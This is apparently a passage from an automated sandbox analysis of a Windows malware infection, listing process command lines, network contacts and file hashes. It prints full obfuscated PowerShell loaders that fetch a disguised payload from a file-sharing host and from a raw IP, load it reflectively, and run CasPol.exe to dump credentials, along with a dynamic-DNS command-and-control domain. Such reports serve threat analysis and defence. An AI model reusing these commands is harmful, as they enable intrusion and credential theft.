ICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3N3aXRob3V0aGFuZGxldGhldGgudmJzIg=='+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8973.tmp" "c:\Users\Admin\AppData\Local\Temp\2cdwynz5\CSCDA64DFACE0DA42CA848DA92076B13078.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxsaURbMV0rJFNIZWxsaWRbMTNdKydYJykgKCgoJ3VTemltYWdlVXJsID0nKycgJysnNkZVaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/JysnZicrJ2lsZWtleT0yQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjEnKyc0YmIyMDljNjJjMScrJzczMDknKyc0NTE3NmEwOTA0ZiA2RlU7dVN6d2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZScrJ20uTmV0LldlYkNsaWVudCcrJzt1U3ppbWFnZUJ5JysndGVzID0gdVN6d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh1U3ppbWFnZVVybCk7dVN6aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbScrJy5UZXh0LicrJ0VuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodVN6aW1hJysnZ2VCeXRlcyk7dVN6c3RhcnRGbGFnID0gNkZVPDxCQVNFNjRfU1RBUlQ+PjZGVTt1U3plJysnbmQnKydGbCcrJ2FnID0gNkZVPDxCQVNFNjRfRU5EPj42RlU7dVN6c3RhcnRJbmRleCA9IHVTemltYWdlVGV4dC5JbmRleE9mKHVTenN0YXJ0RmxhZyk7dVN6ZW5kSW5kZXggPSB1U3ppbWFnZVRleHQuSW5kZXhPZih1U3plbmRGbGFnKTt1U3onKydzdGFydEluZGV4IC1nZSAwIC1hbmQgdVN6JysnZW5kSW5kZXggLWd0IHVTenN0YXJ0JysnSW4nKydkZXg7dVN6c3RhcnRJbmRleCArPSB1U3pzdGFydEZsYWcuTGVuZ3RoO3VTemJhc2U2NExlbmd0aCA9IHVTeicrJ2VuZEluZGV4IC0gdVN6c3RhcnRJbmRleDt1U3piYXNlNjRDb21tYW5kID0gdVN6aW1hJysnZ2VUZXh0LlN1YnN0cmluZyh1U3pzdGFydEluZGV4LCB1U3piYXNlNjRMZW5ndGgpO3VTemJhc2U2NFJldmVyJysnc2VkID0gLWpvaW4gKHVTemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBhUXAgRm9yRWFjaC1PYmplY3QgeyB1U3pfIH0nKycpWy0xLi4tKHVTemJhc2U2NENvbW1hbicrJ2QuTGVuZ3RoKV07dVN6Y29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh1U3piYXNlNjRSZXZlcnNlZCk7JysndVN6bG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHVTemMnKydvbW1hbmRCeXRlcyk7dVN6dmFpTWV0JysnaG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGhvZCg2JysnRlVWQUk2RlUpO3VTenZhaU1ldGhvZC5JbnZva2UodVN6bnVsbCwgQCg2JysnRlV0eHQuU0RPR1RIVy8wNTMvODMxLjE3MS40OS4zMi8vOnB0dGg2RicrJ1UsIDZGVScrJ2Rlc2F0aXZhZG82RlUsIDZGVWRlc2F0aXZhZG82RlUsIDZGVWQnKydlc2F0aXZhZG82RlUsIDZGVUNhc1BvbDZGVSwgNkYnKydVZGVzYXRpdmFkbzZGVSwgNkZVJysnZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVMTZGVSw2RlVkZXNhdGl2YWRvNkZVKSk7JykgIC1yZXBsYWNlIChbY0hhcl01NCtbY0hhcl03MCtbY0hhcl04NSksW2NIYXJdMzktcmVwbGFjZSAgKFtjSGFyXTExNytbY0hhcl04MytbY0hhcl0xMjIpLFtjSGFyXTM2IC1DUkVwTEFjZSAgJ2FRcCcsW2NIYXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nkoydxwzt"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xeuqeqgthchu"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hgzjwaruvkzzyob"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 138.171.94.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 8.8.8.8:53 | 78.209.215.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | 36.228.227.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/2380-0-0x000000007139E000-0x000000007139F000-memory.dmp
memory/2380-1-0x0000000002730000-0x0000000002766000-memory.dmp
memory/2380-3-0x0000000005470000-0x0000000005A98000-memory.dmp
memory/2380-2-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-4-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-5-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2380-7-0x00000000053B0000-0x0000000005416000-memory.dmp
memory/2380-6-0x0000000005240000-0x00000000052A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ult2edik.g24.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2380-17-0x0000000005AA0000-0x0000000005DF4000-memory.dmp
memory/2380-18-0x0000000006060000-0x000000000607E000-memory.dmp
memory/2380-19-0x00000000060E0000-0x000000000612C000-memory.dmp
memory/2788-29-0x0000000006B70000-0x0000000006BA2000-memory.dmp
memory/2788-30-0x000000006DC50000-0x000000006DC9C000-memory.dmp
memory/2788-40-0x0000000006BB0000-0x0000000006BCE000-memory.dmp
memory/2788-41-0x0000000006BE0000-0x0000000006C83000-memory.dmp
memory/2788-42-0x0000000007370000-0x00000000079EA000-memory.dmp
memory/2788-43-0x0000000006D30000-0x0000000006D4A000-memory.dmp
memory/2788-44-0x0000000006D90000-0x0000000006D9A000-memory.dmp
memory/2788-45-0x0000000006FC0000-0x0000000007056000-memory.dmp
memory/2788-46-0x0000000006F30000-0x0000000006F41000-memory.dmp
memory/2788-47-0x0000000006F60000-0x0000000006F6E000-memory.dmp
memory/2788-48-0x0000000006F70000-0x0000000006F84000-memory.dmp
memory/2788-49-0x0000000007080000-0x000000000709A000-memory.dmp
memory/2788-50-0x0000000006FB0000-0x0000000006FB8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.cmdline
| MD5 | b7e3156a3140f8647f63d191069fb96f |
| SHA1 | f672b6c3f2f0093e7cddb361b6798ef3c46f925d |
| SHA256 | c5946a3bf68566c83e41686e40eae3b5ec21141f9d3e49122d786cf5ceb8c652 |
| SHA512 | f3fdcb068e2ef554de73c211bb3ce27b8937bfe856f96bee3a1c22e66414945101953d5a1c7ef782bd0fcab328a81b716b149df12d79a3c654d8a22d6e6a697a |
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\CSCDA64DFACE0DA42CA848DA92076B13078.TMP
| MD5 | 5513a777acc16cc7e61d6626576dfad3 |
| SHA1 | e08b71fbf83acd787eaa5cc6240edcf04d205634 |
| SHA256 | 5d1ce286e0bb062bd644c1d3e858c1e79881910bf7bea56361af51e4a63ddd24 |
| SHA512 | 8a43b689658e809b6efd4f21210d6f1db3b5c2dd48ba0bbdf6f6b0966e297aadf47f993a7cdb5e897348ade1a5e2e8142842a9d01550927ca035ffc3d00ff5b3 |
C:\Users\Admin\AppData\Local\Temp\RES8973.tmp
| MD5 | a4072cfc69e8725ae3f90d7d5d843a3e |
| SHA1 | f4fe528fa2f09b8c312a89844807e2eabcf963a3 |
| SHA256 | 230cfc65eb13d72140be539e0938beca2c4d9e84e313cca7172d11917506b298 |
| SHA512 | ec47becc0ce9e9380d82aafcc9b83b0fa30d7c5556a967678eb4f05f167c79a855ae23234dc4dad5b9997bb763eb08fe014d476d656c6e7d62ae33f5daf9bd40 |
C:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.dll
| MD5 | 0415564716cc54a5359eef0f7f716726 |
| SHA1 | 3bc2653d3f220e634e7fd94ec1a4c745944a6c61 |
| SHA256 | df4ec5135cab9aa5d142f5ae6eb698a5b4dbf4aabfa024cb9d26c459cf7bb573 |
| SHA512 | abc7187d41e765f6777c80e291e9714d5b0134599c2b36935f8e7243ea7a4e278a03f1f24127648df308fd7e69f4acec615725aa808123e71367eb035ee5ad14 |
memory/2380-65-0x0000000006600000-0x0000000006608000-memory.dmp
memory/2380-71-0x000000007139E000-0x000000007139F000-memory.dmp
memory/2380-72-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-73-0x0000000007410000-0x0000000007432000-memory.dmp
memory/2380-74-0x00000000082C0000-0x0000000008864000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 43a2b4a4d85d6bcac9370ac8c43e349e |
| SHA1 | 20dc96aeea54bc80dbf14aa14dc7438a541552a4 |
| SHA256 | 8d997bb66acd09e65f0aa0f85c22e6e662103598b93a25d52b4a1ca041ca3b4d |
| SHA512 | 0e78e95e673d60bd4da138b00f7f56113c61c6e7d73c85781992d465500dd3fc2e7d6473cea1d6ceaa0cde1a0549a613fb65de51aaa7e6a63c7b93f4a02726c0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWErshell.ExE.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/2380-81-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/4704-91-0x0000000005F50000-0x00000000062A4000-memory.dmp
memory/2540-102-0x00000000076C0000-0x0000000007818000-memory.dmp
memory/2540-103-0x0000000007820000-0x00000000078BC000-memory.dmp
memory/1220-104-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-105-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-106-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cfb1d207bb042df913f8b1f4782619b6 |
| SHA1 | 4cef72d8531b3bdfa17fd9b1c4a561f4b0e564d4 |
| SHA256 | f7b4f9ea6407759cef2410343e5717ce240ce1a68fa3695b5a37a3cc365a2c6c |
| SHA512 | 70884297b6a83459b6c9d643138d79157bbcb8d021d346f3c8dde8104abea0c71e9390c14d0d22055425fe13750b243b86a37059829db90fc772d029554a5464 |
memory/1220-110-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-112-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-111-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-113-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-114-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-116-0x0000000000400000-0x000000000047F000-memory.dmp
memory/2356-117-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2988-118-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2988-122-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2988-121-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3128-126-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3128-128-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3128-127-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2356-120-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2356-119-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nkoydxwzt
| MD5 | 7aca43b2800ceb18b3ed2326532545de |
| SHA1 | d4cf207ef85bd749d59c1cb27a09c167ee21523a |
| SHA256 | 3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480 |
| SHA512 | 0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f |
memory/1220-131-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-134-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-135-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-136-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-138-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-137-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-140-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-139-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-141-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-142-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-144-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-143-0x0000000000400000-0x000000000047F000-memory.dmp